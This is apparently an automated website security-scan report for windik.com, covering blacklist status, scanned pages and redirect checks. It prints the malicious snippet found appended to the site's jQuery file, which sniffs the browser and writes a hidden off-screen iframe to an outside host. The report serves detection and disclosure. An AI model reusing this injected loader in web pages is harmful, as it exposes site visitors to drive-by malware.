Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=windik.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://windik.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://windik.com/ | 200 OK Content-Length: 4049 Content-Type: text/html | clean |
http://windik.com/js/min/jquery.js | 200 OK Content-Length: 72815 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function Grandarium() {
    var soset = navigator.userAgent;
    var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
    if (!unicode) {
        document.write('<iframe src="http://turudiosa.nivel7.com.ar/deolitepount15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
    }
}
Grandarium();
(f e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://windik.com/lostpassword.php | 200 OK Content-Length: 2885 Content-Type: text/html | clean |
http://windik.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://windik.com/signup.php | 200 OK Content-Length: 3754 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: windik.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Oct 2014 19:11:26 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Length: 4049
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.18
...4049 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: windik.com
Referer: http://www.google.com/search?q=windik.com
Result:
The result is similar to the first query. There are no suspicious redirects found.